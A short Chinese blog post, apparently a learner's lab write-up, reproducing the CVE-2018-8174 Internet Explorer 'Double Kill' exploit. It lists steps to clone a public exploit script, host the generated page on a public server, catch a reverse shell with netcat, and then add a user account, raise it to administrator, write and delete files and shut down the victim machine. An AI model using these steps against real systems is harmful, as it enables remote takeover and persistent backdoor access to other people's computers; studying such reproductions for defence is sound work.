CVE-2018-8174漏洞復現

來自專欄一個小白的學習成長之路

CVE-2018-8174 「雙殺」漏洞復現

這兩天瞭解了下CVE-2018-8174漏洞,對它進行了復現

CVE-2018-8174漏洞原理:轉自安全客?

www.freebuf.com
圖標

下面是我的復現過程:(文末有復現視頻鏈接)

1.首先需要用到一個有公網ip的伺服器 我的伺服器ip:120.78.71.19

2.ssh登陸上去

3.下載漏洞利用腳本到伺服器

git clone https://github.com/Yt1g3r/CVE-2018-8174_EXP.git

4.Python編譯文件

5.在伺服器上,將產生的exploit.html文件修改為index.html

6.將域名鏈接到文件所在目錄

7.監聽埠,反彈shell

nc -lvvp 19132//填編譯時的哪個埠號

8.被攻擊者用ie瀏覽器打開我的網址,出現錯誤,漏洞利用成功,成功獲取shell許可權

9.測試下,calc 先彈個計算器,成功

10.讀取被攻擊電腦中的txt文件

11.寫一個txt文件到被攻擊電腦中

echo You_have_been_hacked>hello.txt

12.操控被攻擊電腦打開一個網址,用百度測試

13.彈一個告知窗口 Hello,You have been hacked

net user wyb wei666 /add

15.將增加的普通用戶提升為管理員賬戶

16.刪除被攻擊電腦上的文件,用刪除hello.txt演示

17.最後一步,哈哈哈,關機

shutdowns -s -t 15

OK,到此結束,CVE-2018-8174 「雙殺」漏洞復現完成

CVE-2018-8174復現演示?

www.bilibili.com


推薦閱讀:
查看原文 >>
相關文章